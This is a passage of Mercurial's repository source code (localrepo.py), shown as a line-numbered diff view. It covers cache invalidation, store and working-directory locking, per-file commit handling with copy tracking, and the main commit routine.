1416 # updating the unfiltered branchmap should refresh all the others,
1417 # updating the unfiltered branchmap should refresh all the others,
1417 self.ui.debug('updating the branch cache\n')
1418 self.ui.debug('updating the branch cache\n')
1418 branchmap.updatecache(self.filtered('served'))
1419 branchmap.updatecache(self.filtered('served'))
1419
1420
1420 def invalidatecaches(self):
1421 def invalidatecaches(self):
1421
1422
1422 if '_tagscache' in vars(self):
1423 if '_tagscache' in vars(self):
1423 # can't use delattr on proxy
1424 # can't use delattr on proxy
1424 del self.__dict__['_tagscache']
1425 del self.__dict__['_tagscache']
1425
1426
1426 self.unfiltered()._branchcaches.clear()
1427 self.unfiltered()._branchcaches.clear()
1427 self.invalidatevolatilesets()
1428 self.invalidatevolatilesets()
1428 self._sparsesignaturecache.clear()
1429 self._sparsesignaturecache.clear()
1429
1430
1430 def invalidatevolatilesets(self):
1431 def invalidatevolatilesets(self):
1431 self.filteredrevcache.clear()
1432 self.filteredrevcache.clear()
1432 obsolete.clearobscaches(self)
1433 obsolete.clearobscaches(self)
1433
1434
1434 def invalidatedirstate(self):
1435 def invalidatedirstate(self):
1435 '''Invalidates the dirstate, causing the next call to dirstate
1436 '''Invalidates the dirstate, causing the next call to dirstate
1436 to check if it was modified since the last time it was read,
1437 to check if it was modified since the last time it was read,
1437 rereading it if it has.
1438 rereading it if it has.
1438
1439
1439 This is different to dirstate.invalidate() that it doesn't always
1440 This is different to dirstate.invalidate() that it doesn't always
1440 rereads the dirstate. Use dirstate.invalidate() if you want to
1441 rereads the dirstate. Use dirstate.invalidate() if you want to
1441 explicitly read the dirstate again (i.e. restoring it to a previous
1442 explicitly read the dirstate again (i.e. restoring it to a previous
1442 known good state).'''
1443 known good state).'''
1443 if hasunfilteredcache(self, 'dirstate'):
1444 if hasunfilteredcache(self, 'dirstate'):
1444 for k in self.dirstate._filecache:
1445 for k in self.dirstate._filecache:
1445 try:
1446 try:
1446 delattr(self.dirstate, k)
1447 delattr(self.dirstate, k)
1447 except AttributeError:
1448 except AttributeError:
1448 pass
1449 pass
1449 delattr(self.unfiltered(), 'dirstate')
1450 delattr(self.unfiltered(), 'dirstate')
1450
1451
1451 def invalidate(self, clearfilecache=False):
1452 def invalidate(self, clearfilecache=False):
1452 '''Invalidates both store and non-store parts other than dirstate
1453 '''Invalidates both store and non-store parts other than dirstate
1453
1454
1454 If a transaction is running, invalidation of store is omitted,
1455 If a transaction is running, invalidation of store is omitted,
1455 because discarding in-memory changes might cause inconsistency
1456 because discarding in-memory changes might cause inconsistency
1456 (e.g. incomplete fncache causes unintentional failure, but
1457 (e.g. incomplete fncache causes unintentional failure, but
1457 redundant one doesn't).
1458 redundant one doesn't).
1458 '''
1459 '''
1459 unfiltered = self.unfiltered() # all file caches are stored unfiltered
1460 unfiltered = self.unfiltered() # all file caches are stored unfiltered
1460 for k in list(self._filecache.keys()):
1461 for k in list(self._filecache.keys()):
1461 # dirstate is invalidated separately in invalidatedirstate()
1462 # dirstate is invalidated separately in invalidatedirstate()
1462 if k == 'dirstate':
1463 if k == 'dirstate':
1463 continue
1464 continue
1464 if (k == 'changelog' and
1465 if (k == 'changelog' and
1465 self.currenttransaction() and
1466 self.currenttransaction() and
1466 self.changelog._delayed):
1467 self.changelog._delayed):
1467 # The changelog object may store unwritten revisions. We don't
1468 # The changelog object may store unwritten revisions. We don't
1468 # want to lose them.
1469 # want to lose them.
1469 # TODO: Solve the problem instead of working around it.
1470 # TODO: Solve the problem instead of working around it.
1470 continue
1471 continue
1471
1472
1472 if clearfilecache:
1473 if clearfilecache:
1473 del self._filecache[k]
1474 del self._filecache[k]
1474 try:
1475 try:
1475 delattr(unfiltered, k)
1476 delattr(unfiltered, k)
1476 except AttributeError:
1477 except AttributeError:
1477 pass
1478 pass
1478 self.invalidatecaches()
1479 self.invalidatecaches()
1479 if not self.currenttransaction():
1480 if not self.currenttransaction():
1480 # TODO: Changing contents of store outside transaction
1481 # TODO: Changing contents of store outside transaction
1481 # causes inconsistency. We should make in-memory store
1482 # causes inconsistency. We should make in-memory store
1482 # changes detectable, and abort if changed.
1483 # changes detectable, and abort if changed.
1483 self.store.invalidatecaches()
1484 self.store.invalidatecaches()
1484
1485
1485 def invalidateall(self):
1486 def invalidateall(self):
1486 '''Fully invalidates both store and non-store parts, causing the
1487 '''Fully invalidates both store and non-store parts, causing the
1487 subsequent operation to reread any outside changes.'''
1488 subsequent operation to reread any outside changes.'''
1488 # extension should hook this to invalidate its caches
1489 # extension should hook this to invalidate its caches
1489 self.invalidate()
1490 self.invalidate()
1490 self.invalidatedirstate()
1491 self.invalidatedirstate()
1491
1492
1492 @unfilteredmethod
1493 @unfilteredmethod
1493 def _refreshfilecachestats(self, tr):
1494 def _refreshfilecachestats(self, tr):
1494 """Reload stats of cached files so that they are flagged as valid"""
1495 """Reload stats of cached files so that they are flagged as valid"""
1495 for k, ce in self._filecache.items():
1496 for k, ce in self._filecache.items():
1496 if k == 'dirstate' or k not in self.__dict__:
1497 if k == 'dirstate' or k not in self.__dict__:
1497 continue
1498 continue
1498 ce.refresh()
1499 ce.refresh()
1499
1500
1500 def _lock(self, vfs, lockname, wait, releasefn, acquirefn, desc,
1501 def _lock(self, vfs, lockname, wait, releasefn, acquirefn, desc,
1501 inheritchecker=None, parentenvvar=None):
1502 inheritchecker=None, parentenvvar=None):
1502 parentlock = None
1503 parentlock = None
1503 # the contents of parentenvvar are used by the underlying lock to
1504 # the contents of parentenvvar are used by the underlying lock to
1504 # determine whether it can be inherited
1505 # determine whether it can be inherited
1505 if parentenvvar is not None:
1506 if parentenvvar is not None:
1506 parentlock = encoding.environ.get(parentenvvar)
1507 parentlock = encoding.environ.get(parentenvvar)
1507 try:
1508 try:
1508 l = lockmod.lock(vfs, lockname, 0, releasefn=releasefn,
1509 l = lockmod.lock(vfs, lockname, 0, releasefn=releasefn,
1509 acquirefn=acquirefn, desc=desc,
1510 acquirefn=acquirefn, desc=desc,
1510 inheritchecker=inheritchecker,
1511 inheritchecker=inheritchecker,
1511 parentlock=parentlock)
1512 parentlock=parentlock)
1512 except error.LockHeld as inst:
1513 except error.LockHeld as inst:
1513 if not wait:
1514 if not wait:
1514 raise
1515 raise
1515 # show more details for new-style locks
1516 # show more details for new-style locks
1516 if ':' in inst.locker:
1517 if ':' in inst.locker:
1517 host, pid = inst.locker.split(":", 1)
1518 host, pid = inst.locker.split(":", 1)
1518 self.ui.warn(
1519 self.ui.warn(
1519 _("waiting for lock on %s held by process %r "
1520 _("waiting for lock on %s held by process %r "
1520 "on host %r\n") % (desc, pid, host))
1521 "on host %r\n") % (desc, pid, host))
1521 else:
1522 else:
1522 self.ui.warn(_("waiting for lock on %s held by %r\n") %
1523 self.ui.warn(_("waiting for lock on %s held by %r\n") %
1523 (desc, inst.locker))
1524 (desc, inst.locker))
1524 # default to 600 seconds timeout
1525 # default to 600 seconds timeout
1525 l = lockmod.lock(vfs, lockname,
1526 l = lockmod.lock(vfs, lockname,
1526 int(self.ui.config("ui", "timeout")),
1527 int(self.ui.config("ui", "timeout")),
1527 releasefn=releasefn, acquirefn=acquirefn,
1528 releasefn=releasefn, acquirefn=acquirefn,
1528 desc=desc)
1529 desc=desc)
1529 self.ui.warn(_("got lock after %s seconds\n") % l.delay)
1530 self.ui.warn(_("got lock after %s seconds\n") % l.delay)
1530 return l
1531 return l
1531
1532
1532 def _afterlock(self, callback):
1533 def _afterlock(self, callback):
1533 """add a callback to be run when the repository is fully unlocked
1534 """add a callback to be run when the repository is fully unlocked
1534
1535
1535 The callback will be executed when the outermost lock is released
1536 The callback will be executed when the outermost lock is released
1536 (with wlock being higher level than 'lock')."""
1537 (with wlock being higher level than 'lock')."""
1537 for ref in (self._wlockref, self._lockref):
1538 for ref in (self._wlockref, self._lockref):
1538 l = ref and ref()
1539 l = ref and ref()
1539 if l and l.held:
1540 if l and l.held:
1540 l.postrelease.append(callback)
1541 l.postrelease.append(callback)
1541 break
1542 break
1542 else: # no lock have been found.
1543 else: # no lock have been found.
1543 callback()
1544 callback()
1544
1545
1545 def lock(self, wait=True):
1546 def lock(self, wait=True):
1546 '''Lock the repository store (.hg/store) and return a weak reference
1547 '''Lock the repository store (.hg/store) and return a weak reference
1547 to the lock. Use this before modifying the store (e.g. committing or
1548 to the lock. Use this before modifying the store (e.g. committing or
1548 stripping). If you are opening a transaction, get a lock as well.)
1549 stripping). If you are opening a transaction, get a lock as well.)
1549
1550
1550 If both 'lock' and 'wlock' must be acquired, ensure you always acquires
1551 If both 'lock' and 'wlock' must be acquired, ensure you always acquires
1551 'wlock' first to avoid a dead-lock hazard.'''
1552 'wlock' first to avoid a dead-lock hazard.'''
1552 l = self._currentlock(self._lockref)
1553 l = self._currentlock(self._lockref)
1553 if l is not None:
1554 if l is not None:
1554 l.lock()
1555 l.lock()
1555 return l
1556 return l
1556
1557
1557 l = self._lock(self.svfs, "lock", wait, None,
1558 l = self._lock(self.svfs, "lock", wait, None,
1558 self.invalidate, _('repository %s') % self.origroot)
1559 self.invalidate, _('repository %s') % self.origroot)
1559 self._lockref = weakref.ref(l)
1560 self._lockref = weakref.ref(l)
1560 return l
1561 return l
1561
1562
1562 def _wlockchecktransaction(self):
1563 def _wlockchecktransaction(self):
1563 if self.currenttransaction() is not None:
1564 if self.currenttransaction() is not None:
1564 raise error.LockInheritanceContractViolation(
1565 raise error.LockInheritanceContractViolation(
1565 'wlock cannot be inherited in the middle of a transaction')
1566 'wlock cannot be inherited in the middle of a transaction')
1566
1567
1567 def wlock(self, wait=True):
1568 def wlock(self, wait=True):
1568 '''Lock the non-store parts of the repository (everything under
1569 '''Lock the non-store parts of the repository (everything under
1569 .hg except .hg/store) and return a weak reference to the lock.
1570 .hg except .hg/store) and return a weak reference to the lock.
1570
1571
1571 Use this before modifying files in .hg.
1572 Use this before modifying files in .hg.
1572
1573
1573 If both 'lock' and 'wlock' must be acquired, ensure you always acquires
1574 If both 'lock' and 'wlock' must be acquired, ensure you always acquires
1574 'wlock' first to avoid a dead-lock hazard.'''
1575 'wlock' first to avoid a dead-lock hazard.'''
1575 l = self._wlockref and self._wlockref()
1576 l = self._wlockref and self._wlockref()
1576 if l is not None and l.held:
1577 if l is not None and l.held:
1577 l.lock()
1578 l.lock()
1578 return l
1579 return l
1579
1580
1580 # We do not need to check for non-waiting lock acquisition. Such
1581 # We do not need to check for non-waiting lock acquisition. Such
1581 # acquisition would not cause dead-lock as they would just fail.
1582 # acquisition would not cause dead-lock as they would just fail.
1582 if wait and (self.ui.configbool('devel', 'all-warnings')
1583 if wait and (self.ui.configbool('devel', 'all-warnings')
1583 or self.ui.configbool('devel', 'check-locks')):
1584 or self.ui.configbool('devel', 'check-locks')):
1584 if self._currentlock(self._lockref) is not None:
1585 if self._currentlock(self._lockref) is not None:
1585 self.ui.develwarn('"wlock" acquired after "lock"')
1586 self.ui.develwarn('"wlock" acquired after "lock"')
1586
1587
1587 def unlock():
1588 def unlock():
1588 if self.dirstate.pendingparentchange():
1589 if self.dirstate.pendingparentchange():
1589 self.dirstate.invalidate()
1590 self.dirstate.invalidate()
1590 else:
1591 else:
1591 self.dirstate.write(None)
1592 self.dirstate.write(None)
1592
1593
1593 self._filecache['dirstate'].refresh()
1594 self._filecache['dirstate'].refresh()
1594
1595
1595 l = self._lock(self.vfs, "wlock", wait, unlock,
1596 l = self._lock(self.vfs, "wlock", wait, unlock,
1596 self.invalidatedirstate, _('working directory of %s') %
1597 self.invalidatedirstate, _('working directory of %s') %
1597 self.origroot,
1598 self.origroot,
1598 inheritchecker=self._wlockchecktransaction,
1599 inheritchecker=self._wlockchecktransaction,
1599 parentenvvar='HG_WLOCK_LOCKER')
1600 parentenvvar='HG_WLOCK_LOCKER')
1600 self._wlockref = weakref.ref(l)
1601 self._wlockref = weakref.ref(l)
1601 return l
1602 return l
1602
1603
1603 def _currentlock(self, lockref):
1604 def _currentlock(self, lockref):
1604 """Returns the lock if it's held, or None if it's not."""
1605 """Returns the lock if it's held, or None if it's not."""
1605 if lockref is None:
1606 if lockref is None:
1606 return None
1607 return None
1607 l = lockref()
1608 l = lockref()
1608 if l is None or not l.held:
1609 if l is None or not l.held:
1609 return None
1610 return None
1610 return l
1611 return l
1611
1612
1612 def currentwlock(self):
1613 def currentwlock(self):
1613 """Returns the wlock if it's held, or None if it's not."""
1614 """Returns the wlock if it's held, or None if it's not."""
1614 return self._currentlock(self._wlockref)
1615 return self._currentlock(self._wlockref)
1615
1616
1616 def _filecommit(self, fctx, manifest1, manifest2, linkrev, tr, changelist):
1617 def _filecommit(self, fctx, manifest1, manifest2, linkrev, tr, changelist):
1617 """
1618 """
1618 commit an individual file as part of a larger transaction
1619 commit an individual file as part of a larger transaction
1619 """
1620 """
1620
1621
1621 fname = fctx.path()
1622 fname = fctx.path()
1622 fparent1 = manifest1.get(fname, nullid)
1623 fparent1 = manifest1.get(fname, nullid)
1623 fparent2 = manifest2.get(fname, nullid)
1624 fparent2 = manifest2.get(fname, nullid)
1624 if isinstance(fctx, context.filectx):
1625 if isinstance(fctx, context.filectx):
1625 node = fctx.filenode()
1626 node = fctx.filenode()
1626 if node in [fparent1, fparent2]:
1627 if node in [fparent1, fparent2]:
1627 self.ui.debug('reusing %s filelog entry\n' % fname)
1628 self.ui.debug('reusing %s filelog entry\n' % fname)
1628 if manifest1.flags(fname) != fctx.flags():
1629 if manifest1.flags(fname) != fctx.flags():
1629 changelist.append(fname)
1630 changelist.append(fname)
1630 return node
1631 return node
1631
1632
1632 flog = self.file(fname)
1633 flog = self.file(fname)
1633 meta = {}
1634 meta = {}
1634 copy = fctx.renamed()
1635 copy = fctx.renamed()
1635 if copy and copy[0] != fname:
1636 if copy and copy[0] != fname:
1636 # Mark the new revision of this file as a copy of another
1637 # Mark the new revision of this file as a copy of another
1637 # file. This copy data will effectively act as a parent
1638 # file. This copy data will effectively act as a parent
1638 # of this new revision. If this is a merge, the first
1639 # of this new revision. If this is a merge, the first
1639 # parent will be the nullid (meaning "look up the copy data")
1640 # parent will be the nullid (meaning "look up the copy data")
1640 # and the second one will be the other parent. For example:
1641 # and the second one will be the other parent. For example:
1641 #
1642 #
1642 # 0 --- 1 --- 3 rev1 changes file foo
1643 # 0 --- 1 --- 3 rev1 changes file foo
1643 # \ / rev2 renames foo to bar and changes it
1644 # \ / rev2 renames foo to bar and changes it
1644 # \- 2 -/ rev3 should have bar with all changes and
1645 # \- 2 -/ rev3 should have bar with all changes and
1645 # should record that bar descends from
1646 # should record that bar descends from
1646 # bar in rev2 and foo in rev1
1647 # bar in rev2 and foo in rev1
1647 #
1648 #
1648 # this allows this merge to succeed:
1649 # this allows this merge to succeed:
1649 #
1650 #
1650 # 0 --- 1 --- 3 rev4 reverts the content change from rev2
1651 # 0 --- 1 --- 3 rev4 reverts the content change from rev2
1651 # \ / merging rev3 and rev4 should use bar@rev2
1652 # \ / merging rev3 and rev4 should use bar@rev2
1652 # \- 2 --- 4 as the merge base
1653 # \- 2 --- 4 as the merge base
1653 #
1654 #
1654
1655
1655 cfname = copy[0]
1656 cfname = copy[0]
1656 crev = manifest1.get(cfname)
1657 crev = manifest1.get(cfname)
1657 newfparent = fparent2
1658 newfparent = fparent2
1658
1659
1659 if manifest2: # branch merge
1660 if manifest2: # branch merge
1660 if fparent2 == nullid or crev is None: # copied on remote side
1661 if fparent2 == nullid or crev is None: # copied on remote side
1661 if cfname in manifest2:
1662 if cfname in manifest2:
1662 crev = manifest2[cfname]
1663 crev = manifest2[cfname]
1663 newfparent = fparent1
1664 newfparent = fparent1
1664
1665
1665 # Here, we used to search backwards through history to try to find
1666 # Here, we used to search backwards through history to try to find
1666 # where the file copy came from if the source of a copy was not in
1667 # where the file copy came from if the source of a copy was not in
1667 # the parent directory. However, this doesn't actually make sense to
1668 # the parent directory. However, this doesn't actually make sense to
1668 # do (what does a copy from something not in your working copy even
1669 # do (what does a copy from something not in your working copy even
1669 # mean?) and it causes bugs (eg, issue4476). Instead, we will warn
1670 # mean?) and it causes bugs (eg, issue4476). Instead, we will warn
1670 # the user that copy information was dropped, so if they didn't
1671 # the user that copy information was dropped, so if they didn't
1671 # expect this outcome it can be fixed, but this is the correct
1672 # expect this outcome it can be fixed, but this is the correct
1672 # behavior in this circumstance.
1673 # behavior in this circumstance.
1673
1674
1674 if crev:
1675 if crev:
1675 self.ui.debug(" %s: copy %s:%s\n" % (fname, cfname, hex(crev)))
1676 self.ui.debug(" %s: copy %s:%s\n" % (fname, cfname, hex(crev)))
1676 meta["copy"] = cfname
1677 meta["copy"] = cfname
1677 meta["copyrev"] = hex(crev)
1678 meta["copyrev"] = hex(crev)
1678 fparent1, fparent2 = nullid, newfparent
1679 fparent1, fparent2 = nullid, newfparent
1679 else:
1680 else:
1680 self.ui.warn(_("warning: can't find ancestor for '%s' "
1681 self.ui.warn(_("warning: can't find ancestor for '%s' "
1681 "copied from '%s'!\n") % (fname, cfname))
1682 "copied from '%s'!\n") % (fname, cfname))
1682
1683
1683 elif fparent1 == nullid:
1684 elif fparent1 == nullid:
1684 fparent1, fparent2 = fparent2, nullid
1685 fparent1, fparent2 = fparent2, nullid
1685 elif fparent2 != nullid:
1686 elif fparent2 != nullid:
1686 # is one parent an ancestor of the other?
1687 # is one parent an ancestor of the other?
1687 fparentancestors = flog.commonancestorsheads(fparent1, fparent2)
1688 fparentancestors = flog.commonancestorsheads(fparent1, fparent2)
1688 if fparent1 in fparentancestors:
1689 if fparent1 in fparentancestors:
1689 fparent1, fparent2 = fparent2, nullid
1690 fparent1, fparent2 = fparent2, nullid
1690 elif fparent2 in fparentancestors:
1691 elif fparent2 in fparentancestors:
1691 fparent2 = nullid
1692 fparent2 = nullid
1692
1693
1693 # is the file changed?
1694 # is the file changed?
1694 text = fctx.data()
1695 text = fctx.data()
1695 if fparent2 != nullid or flog.cmp(fparent1, text) or meta:
1696 if fparent2 != nullid or flog.cmp(fparent1, text) or meta:
1696 changelist.append(fname)
1697 changelist.append(fname)
1697 return flog.add(text, meta, tr, linkrev, fparent1, fparent2)
1698 return flog.add(text, meta, tr, linkrev, fparent1, fparent2)
1698 # are just the flags changed during merge?
1699 # are just the flags changed during merge?
1699 elif fname in manifest1 and manifest1.flags(fname) != fctx.flags():
1700 elif fname in manifest1 and manifest1.flags(fname) != fctx.flags():
1700 changelist.append(fname)
1701 changelist.append(fname)
1701
1702
1702 return fparent1
1703 return fparent1
1703
1704
1704 def checkcommitpatterns(self, wctx, vdirs, match, status, fail):
1705 def checkcommitpatterns(self, wctx, vdirs, match, status, fail):
1705 """check for commit arguments that aren't committable"""
1706 """check for commit arguments that aren't committable"""
1706 if match.isexact() or match.prefix():
1707 if match.isexact() or match.prefix():
1707 matched = set(status.modified + status.added + status.removed)
1708 matched = set(status.modified + status.added + status.removed)
1708
1709
1709 for f in match.files():
1710 for f in match.files():
1710 f = self.dirstate.normalize(f)
1711 f = self.dirstate.normalize(f)
1711 if f == '.' or f in matched or f in wctx.substate:
1712 if f == '.' or f in matched or f in wctx.substate:
1712 continue
1713 continue
1713 if f in status.deleted:
1714 if f in status.deleted:
1714 fail(f, _('file not found!'))
1715 fail(f, _('file not found!'))
1715 if f in vdirs: # visited directory
1716 if f in vdirs: # visited directory
1716 d = f + '/'
1717 d = f + '/'
1717 for mf in matched:
1718 for mf in matched:
1718 if mf.startswith(d):
1719 if mf.startswith(d):
1719 break
1720 break
1720 else:
1721 else:
1721 fail(f, _("no match under directory!"))
1722 fail(f, _("no match under directory!"))
1722 elif f not in self.dirstate:
1723 elif f not in self.dirstate:
1723 fail(f, _("file not tracked!"))
1724 fail(f, _("file not tracked!"))
1724
1725
1725 @unfilteredmethod
1726 @unfilteredmethod
1726 def commit(self, text="", user=None, date=None, match=None, force=False,
1727 def commit(self, text="", user=None, date=None, match=None, force=False,
1727 editor=False, extra=None):
1728 editor=False, extra=None):
1728 """Add a new revision to current repository.
1729 """Add a new revision to current repository.
1729
1730
1730 Revision information is gathered from the working directory,
1731 Revision information is gathered from the working directory,
1731 match can be used to filter the committed files. If editor is
1732 match can be used to filter the committed files. If editor is
1732 supplied, it is called to get a commit message.
1733 supplied, it is called to get a commit message.
1733 """
1734 """
1734 if extra is None:
1735 if extra is None:
1735 extra = {}
1736 extra = {}
1736
1737
1737 def fail(f, msg):
1738 def fail(f, msg):
1738 raise error.Abort('%s: %s' % (f, msg))
1739 raise error.Abort('%s: %s' % (f, msg))
1739
1740
1740 if not match:
1741 if not match:
1741 match = matchmod.always(self.root, '')
1742 match = matchmod.always(self.root, '')
1742
1743
1743 if not force:
1744 if not force:
1744 vdirs = []
1745 vdirs = []
1745 match.explicitdir = vdirs.append
1746 match.explicitdir = vdirs.append
1746 match.bad = fail
1747 match.bad = fail
1747
1748
1748 wlock = lock = tr = None
1749 wlock = lock = tr = None
1749 try:
1750 try:
1750 wlock = self.wlock()
1751 wlock = self.wlock()
1751 lock = self.lock() # for recent changelog (see issue4368)
1752 lock = self.lock() # for recent changelog (see issue4368)
1752
1753
1753 wctx = self[None]
1754 wctx = self[None]
1754 merge = len(wctx.parents()) > 1
1755 merge = len(wctx.parents()) > 1
1755
1756
1756 if not force and merge and not match.always():
1757 if not force and merge and not match.always():
1757 raise error.Abort(_('cannot partially commit a merge '
1758 raise error.Abort(_('cannot partially commit a merge '
1758 '(do not specify files or patterns)'))
1759 '(do not specify files or patterns)'))
1759
1760
1760 status = self.status(match=match, clean=force)
1761 status = self.status(match=match, clean=force)
1761 if force:
1762 if force:
1762 status.modified.extend(status.clean) # mq may commit clean files
1763 status.modified.extend(status.clean) # mq may commit clean files
1763
1764
1764 # check subrepos
1765 # check subrepos
1765 subs = []
1766 subs = []
1766 commitsubs = set()
1767 commitsubs = set()
1767 newstate = wctx.substate.copy()
1768 newstate = wctx.substate.copy()
1768 # only manage subrepos and .hgsubstate if .hgsub is present
1769 # only manage subrepos and .hgsubstate if .hgsub is present
1769 if '.hgsub' in wctx:
1770 if '.hgsub' in wctx:
1770 # we'll decide whether to track this ourselves, thanks
1771 # we'll decide whether to track this ourselves, thanks
1771 for c in status.modified, status.added, status.removed:
1772 for c in status.modified, status.added, status.removed:
1772 if '.hgsubstate' in c:
1773 if '.hgsubstate' in c:
1773 c.remove('.hgsubstate')
1774 c.remove('.hgsubstate')
1774
1775
1775 # compare current state to last committed state
1776 # compare current state to last committed state
1776 # build new substate based on last committed state
1777 # build new substate based on last committed state
1777 oldstate = wctx.p1().substate
1778 oldstate = wctx.p1().substate
1778 for s in sorted(newstate.keys()):
1779 for s in sorted(newstate.keys()):
1779 if not match(s):
1780 if not match(s):
1780 # ignore working copy, use old state if present
1781 # ignore working copy, use old state if present
1781 if s in oldstate:
1782 if s in oldstate:
1782 newstate[s] = oldstate[s]
1783 newstate[s] = oldstate[s]
1783 continue
1784 continue
1784 if not force:
1785 if not force:
1785 raise error.Abort(
1786 raise error.Abort(
1786 _("commit with new subrepo %s excluded") % s)
1787 _("commit with new subrepo %s excluded") % s)
1787 dirtyreason = wctx.sub(s).dirtyreason(True)
1788 dirtyreason = wctx.sub(s).dirtyreason(True)
1788 if dirtyreason:
1789 if dirtyreason:
1789 if not self.ui.configbool('ui', 'commitsubrepos'):
1790 if not self.ui.configbool('ui', 'commitsubrepos'):
1790 raise error.Abort(dirtyreason,
1791 raise error.Abort(dirtyreason,
1791 hint=_("use --subrepos for recursive commit"))
1792 hint=_("use --subrepos for recursive commit"))
1792 subs.append(s)
1793 subs.append(s)
1793 commitsubs.add(s)
1794 commitsubs.add(s)
1794 else:
1795 else:
1795 bs = wctx.sub(s).basestate()
1796 bs = wctx.sub(s).basestate()
1796 newstate[s] = (newstate[s][0], bs, newstate[s][2])
1797 newstate[s] = (newstate[s][0], bs, newstate[s][2])
1797 if oldstate.get(s, (None, None, None))[1] != bs:
1798 if oldstate.get(s, (None, None, None))[1] != bs:
1798 subs.append(s)
1799 subs.append(s)
1799
1800
1800 # check for removed subrepos
1801 # check for removed subrepos
1801 for p in wctx.parents():
1802 for p in wctx.parents():
1802 r = [s for s in p.substate if s not in newstate]
1803 r = [s for s in p.substate if s not in newstate]
1803 subs += [s for s in r if match(s)]
1804 subs += [s for s in r if match(s)]
1804 if subs:
1805 if subs:
1805 if (not match('.hgsub') and
1806 if (not match('.hgsub') and
1806 '.hgsub' in (wctx.modified() + wctx.added())):
1807 '.hgsub' in (wctx.modified() + wctx.added())):
1807 raise error.Abort(
1808 raise error.Abort(
1808 _("can't commit subrepos without .hgsub"))
1809 _("can't commit subrepos without .hgsub"))
1809 status.modified.insert(0, '.hgsubstate')
1810 status.modified.insert(0, '.hgsubstate')
1810
1811
1811 elif '.hgsub' in status.removed:
1812 elif '.hgsub' in status.removed:
1812 # clean up .hgsubstate when .hgsub is removed
1813 # clean up .hgsubstate when .hgsub is removed
1813 if ('.hgsubstate' in wctx and
1814 if ('.hgsubstate' in wctx and
1814 '.hgsubstate' not in (status.modified + status.added +
1815 '.hgsubstate' not in (status.modified + status.added +
1815 status.removed)):
1816 status.removed)):
1816 status.removed.insert(0, '.hgsubstate')
1817 status.removed.insert(0, '.hgsubstate')
1817
1818
1818 # make sure all explicit patterns are matched
1819 # make sure all explicit patterns are matched
1819 if not force:
1820 if not force:
1820 self.checkcommitpatterns(wctx, vdirs, match, status, fail)
1821 self.checkcommitpatterns(wctx, vdirs, match, status, fail)
1821
1822
1822 cctx = context.workingcommitctx(self, status,
1823 cctx = context.workingcommitctx(self, status,
1823 text, user, date, extra)
1824 text, user, date, extra)
1824
1825
1825 # internal config: ui.allowemptycommit
1826 # internal config: ui.allowemptycommit
1826 allowemptycommit = (wctx.branch() != wctx.p1().branch()
1827 allowemptycommit = (wctx.branch() != wctx.p1().branch()
1827 or extra.get('close') or merge or cctx.files()
1828 or extra.get('close') or merge or cctx.files()
1828 or self.ui.configbool('ui', 'allowemptycommit'))
1829 or self.ui.configbool('ui', 'allowemptycommit'))
1829 if not allowemptycommit:
1830 if not allowemptycommit:
1830 return None
1831 return None
1831
1832
1832 if merge and cctx.deleted():
1833 if merge and cctx.deleted():
1833 raise error.Abort(_("cannot commit merge with missing files"))
1834 raise error.Abort(_("cannot commit merge with missing files"))
1834
1835
1835 ms = mergemod.mergestate.read(self)
1836 ms = mergemod.mergestate.read(self)
1836 mergeutil.checkunresolved(ms)
1837 mergeutil.checkunresolved(ms)
1837
1838
1838 if editor:
1839 if editor:
1839 cctx._text = editor(self, cctx, subs)
1840 cctx._text = editor(self, cctx, subs)
1840 edited = (text != cctx._text)
1841 edited = (text != cctx._text)
1841
1842
1842 # Save commit message in case this transaction gets rolled back
1843 # Save commit message in case this transaction gets rolled back
1843 # (e.g. by a pretxncommit hook). Leave the content alone on
1844 # (e.g. by a pretxncommit hook). Leave the content alone on
1844 # the assumption that the user will use the same editor again.
1845 # the assumption that the user will use the same editor again.
1845 msgfn = self.savecommitmessage(cctx._text)
1846 msgfn = self.savecommitmessage(cctx._text)
1846
1847
1847 # commit subs and write new state
1848 # commit subs and write new state
1848 if subs:
1849 if subs:
1849 for s in sorted(commitsubs):
1850 for s in sorted(commitsubs):
1850 sub = wctx.sub(s)
1851 sub = wctx.sub(s)
1851 self.ui.status(_('committing subrepository %s\n') %
1852 self.ui.status(_('committing subrepository %s\n') %
1852 subrepo.subrelpath(sub))
1853 subrepo.subrelpath(sub))
1853 sr = sub.commit(cctx._text, user, date)
1854 sr = sub.commit(cctx._text, user, date)
1854 newstate[s] = (newstate[s][0], sr)
1855 newstate[s] = (newstate[s][0], sr)
1855 subrepo.writestate(self, newstate)
1856 subrepo.writestate(self, newstate)
1856
1857
1857 p1, p2 = self.dirstate.parents()
1858 p1, p2 = self.dirstate.parents()
1858 hookp1, hookp2 = hex(p1), (p2 != nullid and hex(p2) or '')
1859 hookp1, hookp2 = hex(p1), (p2 != nullid and hex(p2) or '')
1859 try:
1860 try:
1860 self.hook("precommit", throw=True, parent1=hookp1,
1861 self.hook("precommit", throw=True, parent1=hookp1,
1861 parent2=hookp2)
1862 parent2=hookp2)
1862 tr = self.transaction('commit')
1863 tr = self.transaction('commit')
1863 ret = self.commitctx(cctx, True)
1864 ret = self.commitctx(cctx, True)
1864 except: # re-raises
1865 except: # re-raises
1865 if edited:
1866 if edited:
1866 self.ui.write(
1867 self.ui.write(
1867 _('note: commit message saved in %s\n') % msgfn)
1868 _('note: commit message saved in %s\n') % msgfn)
1868 raise
1869 raise
1869 # update bookmarks, dirstate and mergestate
1870 # update bookmarks, dirstate and mergestate
1870 bookmarks.update(self, [p1, p2], ret)
1871 bookmarks.update(self, [p1, p2], ret)
1871 cctx.markcommitted(ret)
1872 cctx.markcommitted(ret)
1872 ms.reset()
1873 ms.reset()
1873 tr.close()
1874 tr.close()
1874
1875
1875 finally:
1876 finally:
1876 lockmod.release(tr, lock, wlock)
1877 lockmod.release(tr, lock, wlock)
1877
1878
1878 def commithook(node=hex(ret), parent1=hookp1, parent2=hookp2):
1879 def commithook(node=hex(ret), parent1=hookp1, parent2=hookp2):
1879 # hack for command that use a temporary commit (eg: histedit)
1880 # hack for command that use a temporary commit (eg: histedit)
1880 # temporary commit got stripped before hook release
1881 # temporary commit got stripped before hook release
1881 if self.changelog.hasnode(ret):
1882 if self.changelog.hasnode(ret):
1882 self.hook("commit", node=node, parent1=parent1,
1883 self.hook("commit", node=node, parent1=parent1,
1883 parent2=parent2)
1884 parent2=parent2)
1884 self._afterlock(commithook)
1885 self._afterlock(commithook)
1885 return ret
1886 return ret
1886
1887
1887 @unfilteredmethod
1888 @unfilteredmethod
1888 def commitctx(self, ctx, error=False):
1889 def commitctx(self, ctx, error=False):
1889 """Add a new revision to current repository.
1890 """Add a new revision to current repository.
1890 Revision information is passed via the context argument.
1891 Revision information is passed via the context argument.
